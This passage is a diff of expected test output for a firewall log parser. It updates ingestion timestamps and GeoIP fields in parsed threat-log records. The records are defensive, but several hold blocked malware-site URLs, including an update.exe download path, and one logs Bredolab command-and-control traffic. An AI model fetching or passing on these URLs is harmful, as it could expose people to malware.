-3411,7 +3291,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079121900Z", + "ingested": "2021-12-14T14:49:56.151588315Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -3436,22 +3316,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -3554,7 +3429,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079127Z", + "ingested": "2021-12-14T14:49:56.151588663Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -3579,22 +3454,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -3697,7 +3567,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079134700Z", + "ingested": "2021-12-14T14:49:56.151589006Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -3722,22 +3592,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -3840,7 +3705,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079138700Z", + "ingested": "2021-12-14T14:49:56.151589358Z", "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", @@ -3865,22 +3730,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -3983,7 +3843,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079143600Z", + "ingested": "2021-12-14T14:49:56.151589695Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -4008,22 +3868,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -4126,7 +3981,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079170300Z", + "ingested": "2021-12-14T14:49:56.151590038Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25062,1,59269,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -4151,22 +4006,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -4269,7 +4119,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079175300Z", + "ingested": "2021-12-14T14:49:56.151590440Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,26266,1,59270,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -4294,22 +4144,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -4412,7 +4257,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079181100Z", + "ingested": "2021-12-14T14:49:56.151590920Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,23898,1,59274,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -4437,22 +4282,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -4555,7 +4395,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079187Z", + "ingested": "2021-12-14T14:49:56.151591270Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25259,1,59273,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -4580,22 +4420,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -4698,7 +4533,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079192800Z", + "ingested": "2021-12-14T14:49:56.151591782Z", "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26466,1,59272,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", @@ -4723,22 +4558,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -4839,7 +4669,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079214800Z", + "ingested": "2021-12-14T14:49:56.151592202Z", "original": "Oct 30 09:46:47 1,2012/10/30 09:46:47,01606001116,THREAT,url,1,2012/04/10 04:39:43,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:44,4086,1,59261,80,0,0,0x200000,tcp,block-url,\"wantfinest.com/tds/in.cgi?default\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:46:47.000-04:00", "timezone": "America/New_York", @@ -4864,22 +4694,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Korea Republic Of", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -4980,7 +4805,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079220900Z", + "ingested": "2021-12-14T14:49:56.151592674Z", "original": "Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:38,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:39,26534,1,59248,80,0,0,0x200000,tcp,block-url,\"sameshitasiteverwas.com/traf/tds/in.cgi?2\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Korea Republic Of,0,", "created": "2012-10-30T09:47:02.000-04:00", "timezone": "America/New_York", @@ -5005,22 +4830,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Russian Federation", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -5121,7 +4941,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079226800Z", + "ingested": "2021-12-14T14:49:56.151593027Z", "original": "Oct 30 09:47:02 1,2012/10/30 09:47:02,01606001116,THREAT,url,1,2012/04/10 04:39:39,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:40,26965,1,59251,80,0,0,0x200000,tcp,block-url,\"svarkon.ru/update.exe\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2012-10-30T09:47:02.000-04:00", "timezone": "America/New_York", @@ -5146,22 +4966,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -5262,7 +5077,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079232700Z", + "ingested": "2021-12-14T14:49:56.151593366Z", "original": "Oct 30 09:47:12 1,2012/10/30 09:47:12,01606001116,THREAT,url,1,2012/04/10 04:39:36,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:37,26076,1,59244,80,0,0,0x200000,tcp,block-url,\"onlinescanxpp.com/land/eurl/1.php?code=\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:47:12.000-04:00", "timezone": "America/New_York", @@ -5287,22 +5102,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -5403,7 +5213,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079238500Z", + "ingested": "2021-12-14T14:49:56.151593708Z", "original": "Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:34,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:35,26198,1,59237,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/conn/?JKV_1RWbUUdIfRUWUaITfdIfbREdYEYdfTTRI-6XBB_1WQR-6GF5_1AU-6LC6_1Y-gW-gEUQQ-gE-tsDF6K5D_rpX51_rR-t-66FC_1Q_fQ_fQ_fQ_fQ_fQ_fQ_fQ-62BG_1Q-672V_1YOR-6N8J_1Q-6252_1WQRR-69LV_1-65GZ_1W-6\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:47:17.000-04:00", "timezone": "America/New_York", @@ -5428,22 +5238,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -5544,7 +5349,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079244200Z", + "ingested": "2021-12-14T14:49:56.151594108Z", "original": "Oct 30 09:47:17 1,2012/10/30 09:47:17,01606001116,THREAT,url,1,2012/04/10 04:39:35,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:36,26056,1,59238,80,0,0,0x200000,tcp,block-url,\"nolagtime.com/gwc.txt\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:47:17.000-04:00", "timezone": "America/New_York", @@ -5569,22 +5374,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -5685,7 +5485,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079250Z", + "ingested": "2021-12-14T14:49:56.151594475Z", "original": "Oct 30 09:51:03 1,2012/10/30 09:51:03,01606001116,THREAT,url,1,2012/04/10 04:38:19,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:20,25465,1,59010,80,0,0,0x200000,tcp,block-url,\"karavan.us/bon/index.php\",(9999),unknown,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:51:03.000-04:00", "timezone": "America/New_York", @@ -5710,22 +5510,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -5826,7 +5621,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079255900Z", + "ingested": "2021-12-14T14:49:56.151594849Z", "original": "Oct 30 09:51:23 1,2012/10/30 09:51:23,01606001116,THREAT,url,1,2012/04/10 04:38:14,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:15,24316,1,58969,80,0,0,0x200000,tcp,block-url,\"findnolimits.com/go.php?sid=1\",(9999),dead-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:51:23.000-04:00", "timezone": "America/New_York", @@ -5851,22 +5646,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Russian Federation", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -5967,7 +5757,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079261700Z", + "ingested": "2021-12-14T14:49:56.151595207Z", "original": "Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,17258,1,58941,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/moun.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2012-10-30T09:51:33.000-04:00", "timezone": "America/New_York", @@ -5992,22 +5782,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Russian Federation", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -6108,7 +5893,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079267400Z", + "ingested": "2021-12-14T14:49:56.151595555Z", "original": "Oct 30 09:51:33 1,2012/10/30 09:51:33,01606001116,THREAT,url,1,2012/04/10 04:38:12,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:38:13,24735,1,58942,80,0,0,0x200000,tcp,block-url,\"bizoplata.ru/palast.html\",(9999),parked-domains,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Russian Federation,0,", "created": "2012-10-30T09:51:33.000-04:00", "timezone": "America/New_York", @@ -6147,22 +5932,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -6249,7 +6029,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:42:59.079273200Z", + "ingested": "2021-12-14T14:49:56.151595900Z", "original": "Oct 30 09:53:33 1,2012/10/30 09:53:33,01606001116,THREAT,spyware,1,2012/04/10 04:37:28,175.16.199.1,192.168.0.2,0.0.0.0,0.0.0.0,rule1,,crusher,web-browsing,vsys1,untrust,trust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:33,23497,1,80,58849,0,0,0x200000,tcp,drop-all-packets,\"controller.php\",Bredolab.Gen Command and Control Traffic(13024),any,critical,server-to-client,0,0x0,United States,192.168.0.0-192.168.255.255,0,", "created": "2012-10-30T09:53:33.000-04:00", "timezone": "America/New_York", @@ -6271,22 +6051,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Canada", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -6387,7 +6162,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079277300Z", + "ingested": "2021-12-14T14:49:56.151596274Z", "original": "Oct 30 09:53:38 1,2012/10/30 09:53:38,01606001116,THREAT,url,1,2012/04/10 04:37:32,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:32,23711,1,58856,80,0,0,0x200000,tcp,block-url,\"www.15min.it/\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Canada,0,", "created": "2012-10-30T09:53:38.000-04:00", "timezone": "America/New_York", @@ -6412,22 +6187,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -6528,7 +6298,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079282Z", + "ingested": "2021-12-14T14:49:56.151596615Z", "original": "Oct 30 09:53:48 1,2012/10/30 09:53:48,01606001116,THREAT,url,1,2012/04/10 04:37:27,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:27,23659,1,58847,80,0,0,0x200000,tcp,block-url,\"tubemov.com/\",(9999),adult-and-pornography,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:53:48.000-04:00", "timezone": "America/New_York", @@ -6553,22 +6323,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "Virgin Islands British", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -6669,7 +6434,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079287400Z", + "ingested": "2021-12-14T14:49:56.151596972Z", "original": "Oct 30 09:53:58 1,2012/10/30 09:53:58,01606001116,THREAT,url,1,2012/04/10 04:37:25,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:25,23782,1,58841,80,0,0,0x200000,tcp,block-url,\"pagesinxt.com/?dn=teenstube.us\u0026flrdr=yes\u0026nxte=js\",(9999),malware-sites,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,Virgin Islands British,0,", "created": "2012-10-30T09:53:58.000-04:00", "timezone": "America/New_York", @@ -6694,22 +6459,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 80, "ip": "175.16.199.1" }, @@ -6810,7 +6570,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:42:59.079292300Z", + "ingested": "2021-12-14T14:49:56.151597346Z", "original": "Oct 30 09:55:23 1,2012/10/30 09:55:23,01606001116,THREAT,url,1,2012/04/10 04:37:05,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:37:06,23239,1,58795,80,0,0,0x200000,tcp,block-url,\"movfree.com/\",(9999),spyware-and-adware,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,", "created": "2012-10-30T09:55:23.000-04:00", "timezone": "America/New_York", @@ -6835,22 +6595,17 @@ "nat": {}, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA 